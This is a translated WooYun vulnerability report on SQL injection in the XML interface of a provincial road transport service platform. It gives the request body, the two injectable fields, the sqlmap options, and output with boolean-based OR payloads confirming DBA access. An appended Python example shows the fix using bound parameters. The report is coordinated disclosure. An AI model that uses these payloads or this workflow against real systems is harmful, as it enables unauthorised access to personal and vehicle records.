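Vulnerability summary

Bug ID: wooyun-2015-0154453

Vulnerability title: Multiple OR-type SQL injections in the XML interface of a provincial road transport online service platform (DBA privileges + 22 databases + several million records + more than ten thousand coach records)

Related vendor: cncert National Internet Emergency Center

Vulnerability author: 路人甲

Submitted: 2015-11-20 20:16

Fixed: 2016-01-11 15:32

Published: 2016-01-11 15:32

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Vulnerability status: Handed over to a third-party partner organization (cncert National Internet Emergency Center) for handling

Vulnerability source: http://www.wooyun.org; for questions or help, contact [email protected]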


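Vulnerability details

Disclosure status:

2015-11-20: Details reported to the vendor; waiting for the vendor to respond
2015-11-24: Vendor has confirmed; details disclosed to the vendor only
2015-12-04: Details disclosed to core white hats and experts in related fields
2015-12-14: Details disclosed to regular white hats
2015-12-24: Details disclosed to intern white hats
2016-01-11: Details disclosed to the public

Brief description:

I don't run into XML ones very often!~~~

Detailed description:

First, the address:
**.**.**.**:850/jlolmis/olallow/publicCharterList.jsp
Fill in some arbitrary numbers, then capture the request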

**.**.**.**:850/jlolmis/Ajax2Servlet?style=new&tier=business (POST)
<?xml version="1.0" encoding="GBK"?>
<input><head><action>fzrtmis.hztech.middle.per.AppComm,getAppList</action></head><body><XMLACTION>XML.APPPER.getPublicCharterList</XMLACTION><GETCOUNTXMLACTION>XML.APPPER.getPublicCharterListNum</GETCOUNTXMLACTION><PAGECOUNTYS>10</PAGECOUNTYS><RECUSETCOUNTYS>96349</RECUSETCOUNTYS><PAGEINDEXYS>1</PAGEINDEXYS><QRCODE>2</QRCODE><GRADE_CHARTER_MARK>1</GRADE_CHARTER_MARK><BRACOLOR>2</BRACOLOR><BRANUM>3</BRANUM></body></input>


SQL injection exists at two points, <BRACOLOR>2</BRACOLOR> and <QRCODE>2</QRCODE>


Tested with sqlmap, adding these parameters:
--threads 10 --dbms "MySQL" --level 5 --risk 3 --dbms "Oracle" --current-user --current-db --is-dba

SOAP/XML like data found in POST data. Do you want to process it? [Y/n/q] y
[01:17:53] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: (custom) POST
Parameter: XML (generic) #7*
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: <?xml version="1.0" encoding="GBK"?>
<input><head><action>fzrtmis.hztech.middle.per.AppComm,getAppList</action></head
><body><XMLACTION>XML.APPPER.getPublicCharterList</XMLACTION><GETCOUNTXMLACTION>
XML.APPPER.getPublicCharterListNum</GETCOUNTXMLACTION><PAGECOUNTYS>10</PAGECOUNT
YS><RECUSETCOUNTYS>96349</RECUSETCOUNTYS><PAGEINDEXYS>1</PAGEINDEXYS><QRCODE>-76
64' OR (4149=4149) AND 'cgaQ'='cgaQ</QRCODE><GRADE_CHARTER_MARK>1</GRADE_CHARTER
_MARK><BRACOLOR>2</BRACOLOR><BRANUM>3</BRANUM></body></input>
Place: (custom) POST
Parameter: XML (generic) #9*
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: <?xml version="1.0" encoding="GBK"?>
<input><head><action>fzrtmis.hztech.middle.per.AppComm,getAppList</action></head
><body><XMLACTION>XML.APPPER.getPublicCharterList</XMLACTION><GETCOUNTXMLACTION>
XML.APPPER.getPublicCharterListNum</GETCOUNTXMLACTION><PAGECOUNTYS>10</PAGECOUNT
YS><RECUSETCOUNTYS>96349</RECUSETCOUNTYS><PAGEINDEXYS>1</PAGEINDEXYS><QRCODE>2</
QRCODE><GRADE_CHARTER_MARK>1</GRADE_CHARTER_MARK><BRACOLOR>-1553' OR (7578=7578)
AND 'PIqS'='PIqS</BRACOLOR><BRANUM>3</BRANUM></body></input>
---
there were multiple injection points, please select the one to use for following
injections:
[0] place: (custom) POST, parameter: XML (generic) #7*, type: Single quoted stri
ng (default)
[1] place: (custom) POST, parameter: XML (generic) #9*, type: Single quoted stri
ng
[q] Quit
> 0
[01:17:55] [INFO] the back-end DBMS is Oracle
back-end DBMS: Oracle
[01:17:55] [INFO] fetching current user
[01:17:55] [INFO] retrieving the length of query output
[01:17:55] [INFO] retrieved: 10
[01:18:11] [INFO] retrieved: HYT2LINEHN
current user: 'HYT2LINEHN'
[01:18:11] [INFO] fetching current database
[01:18:11] [INFO] retrieving the length of query output
[01:18:11] [INFO] resumed: 10
[01:18:11] [INFO] resumed: HYT2LINEHN
[01:18:11] [WARNING] on Oracle you'll need to use schema names for enumeration a
s the counterpart to database names on other DBMSes
current schema (equivalent to database on Oracle): 'HYT2LINEHN'
[01:18:11] [INFO] testing if current user is DBA
current user is DBA: True
available databases [22]:




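The remaining databases were not tested; I'd guess they also hold several million records!~~~ I believe there is plenty of user and vehicle information too. I won't continue, it is just too slow!~~~

Proof of vulnerability:

As above

Fix:

You know what to do!~~~

Copyright notice: when reposting, please credit the source 路人甲@乌云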
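
The report does not spell out the fix. As an added example (not part of the original report and not the platform's own code), the following Python reads the QRCODE and BRACOLOR elements from an XML body and runs the same lookup two ways: with the element text concatenated into the SQL string, and with the values validated and bound as parameters. Assumptions: the charter table, its columns and rows, and all function names are hypothetical; sqlite3 stands in for the Oracle back end; the request body is trimmed to the two reported fields; the test string is the QRCODE value shown in the sqlmap output above.

```python
import re
import sqlite3
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

# QRCODE value copied from the sqlmap output in the report.
PAGE_PAYLOAD = "-7664' OR (4149=4149) AND 'cgaQ'='cgaQ"

# Assumption: both fields are short numeric codes, as the form suggests.
NUMERIC = re.compile(r"[0-9]{1,20}")


def make_db():
    """Constructed in-memory table standing in for the real one."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE charter (qrcode TEXT, bracolor TEXT, owner TEXT)")
    conn.executemany(
        "INSERT INTO charter VALUES (?, ?, ?)",
        [("1001", "2", "A"), ("1002", "2", "B"), ("1003", "5", "C")],
    )
    return conn


def build_body(qrcode, bracolor):
    """Constructed request body, trimmed to the two fields the report flags."""
    return ("<input><body><QRCODE>%s</QRCODE><BRACOLOR>%s</BRACOLOR>"
            "</body></input>" % (escape(qrcode), escape(bracolor)))


def read_fields(xml_body):
    """Return the text of the QRCODE and BRACOLOR elements."""
    body = ET.fromstring(xml_body).find("body")
    return body.findtext("QRCODE", ""), body.findtext("BRACOLOR", "")


def lookup_concat(conn, xml_body):
    """'Before': element text is pasted into the SQL string."""
    qrcode, bracolor = read_fields(xml_body)
    sql = ("SELECT owner FROM charter WHERE qrcode = '" + qrcode +
           "' AND bracolor = '" + bracolor + "' ORDER BY owner")
    return [row[0] for row in conn.execute(sql)]


def lookup_bound(conn, xml_body, validate=True):
    """'After': allow-list check, then values passed as bound parameters."""
    qrcode, bracolor = read_fields(xml_body)
    if validate and not (NUMERIC.fullmatch(qrcode) and NUMERIC.fullmatch(bracolor)):
        raise ValueError("rejected non-numeric field")
    sql = ("SELECT owner FROM charter "
           "WHERE qrcode = ? AND bracolor = ? ORDER BY owner")
    return [row[0] for row in conn.execute(sql, (qrcode, bracolor))]


if __name__ == "__main__":
    db = make_db()
    crafted = build_body(PAGE_PAYLOAD, "2")
    print("concatenated:", lookup_concat(db, crafted))
    print("bound:", lookup_bound(db, crafted, validate=False))
```

With binding, the quote characters stay inside the value being compared, so the crafted request matches no row; the allow-list check rejects it before the query runs. In a Java servlet such as the one in the report, the equivalent of the bound query is a JDBC PreparedStatement.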


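Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 13

Confirmed: 2015-11-24 17:34

Vendor reply:

CNVD confirmed and reproduced the vulnerability as described. It has been passed via CNCERT to the Jilin branch center, which will coordinate follow-up handling with the organization that manages the website.

Latest status:

None yet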

